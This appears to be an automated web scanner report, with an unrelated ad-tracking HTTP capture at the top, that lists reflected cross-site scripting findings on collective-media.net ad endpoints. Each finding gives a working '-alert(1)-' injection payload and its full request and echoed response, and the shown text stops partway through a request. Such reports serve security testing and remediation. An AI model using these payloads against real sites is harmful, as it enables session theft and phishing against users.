GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Capplehome%2F1%2FH.22.1%2Fs45228154349606%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D21%252F6%252F2011%252015%253A25%253A9%25204%2520300%26pageName%3Dapple%2520-%2520index%252Ftab%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.homepage%26c4%3DD%253Dg%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Capplehome%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Dhomepage%253D1%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D723%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BWPI%2520Detector%25201.3%253BDefault%2520Plug-in%253B%26AQE%3D1b4827%0d%0a1a9ebdf4b81&A2S=1;ord=1742714097 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606?AQB=1&vvpr=true&&ndh=1&t=21%2F6%2F2011%2015%3A25%3A9%204%20300&pageName=apple%20-%20index%2Ftab%20(us)&g=http%3A%2F%2Fwww.apple.com%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.homepage&c4=D%3Dg&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Capplehome&c48=1&c49=D%3Ds_vi&c50=homepage%3D1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&AQE=1b4827
1a9ebdf4b81
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1311279927:
Date: Thu, 21 Jul 2011 20:25:27 GMT
Server: GFE/2.0
Content-Type: text/html


3. Cross-site scripting (reflected)  previous  next
There are 134 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73883'-alert(1)-'aea0893a815 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook73883'-alert(1)-'aea0893a815/ford_ron_071911;sz=300x250;ord=1520731557? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook73883'-alert(1)-'aea0893a815/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.2. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bcfc'-alert(1)-'53d92bb185c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c;sz=300x250;ord=1520731557? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_0719114bcfc'-alert(1)-'53d92bb185c;sz=300x250;net=cm;ord=1520731557;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2919b'-alert(1)-'05bcbf3a0e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 463
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?&2919b'-alert(1)-'05bcbf3a0e5=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.yearbook/ford_ron_071911

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f83'-alert(1)-'2441cffc4b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 460
Date: Thu, 21 Jul 2011 18:00:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:44 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557?d5f83'-alert(1)-'2441cffc4b5;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee038'-alert(1)-'ff9be4c80be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curseee038'-alert(1)-'ff9be4c80be/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curseee038'-alert(1)-'ff9be4c80be/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/idgt.curse/idgtcoad [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d26e'-alert(1)-'fa2fdef4e1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 485
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad7d26e'-alert(1)-'fa2fdef4e1e;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/idgt.curse/idgtcoad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b429'-alert(1)-'c56bbbc539a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 489
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b48'-alert(1)-'d9ff14e8a82 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 486
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8194'-alert(1)-'c19d349c966 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bostonb8194'-alert(1)-'c19d349c966/life;sz=728x90;click0=;ord=1100566473? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Sat, 23 Jul 2011 13:48:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:17 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bostonb8194'-alert(1)-'c19d349c966/life;sz=728x90;net=q1;ord=1100566473;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b33bd'-alert(1)-'80c1110add4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4;sz=728x90;click0=;ord=1100566473? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Sat, 23 Jul 2011 13:48:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:17 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4;sz=728x90;net=q1;ord=1100566473;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d913'-alert(1)-'3feb78746bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?&1d913'-alert(1)-'3feb78746bb=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
